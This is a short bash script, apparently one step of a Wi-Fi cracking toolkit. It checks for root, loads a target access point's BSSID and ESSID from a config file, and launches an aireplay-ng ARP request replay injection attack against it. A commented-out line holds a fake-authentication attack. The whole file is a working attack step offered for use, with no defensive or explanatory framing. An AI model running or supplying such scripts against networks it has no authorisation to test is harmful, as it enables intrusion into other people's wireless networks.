#!/bin/bash

if [ "$(id -u)" != "0" ]; then
	echo "This script must be run as root" 1>&2
	exit 1
fi

if [ -f ../../cfg/target.conf ]; then
	. ../../cfg/target.conf
else
	echo "Error: No target set!"
	exit 1
fi

. ../../cfg/hardware.conf

echo "We will now try to capture an ARP request. This may take a while on some networks."
echo "The injection attack will begin once we intercept a request."
aireplay-ng -3 -b $BSSID -h $FAKE_HOST $WLAN
#aireplay-ng -1 6000 -o1 -q 12 -e $ESSID -a $BSSID -h $FAKE_HOST $WLAN
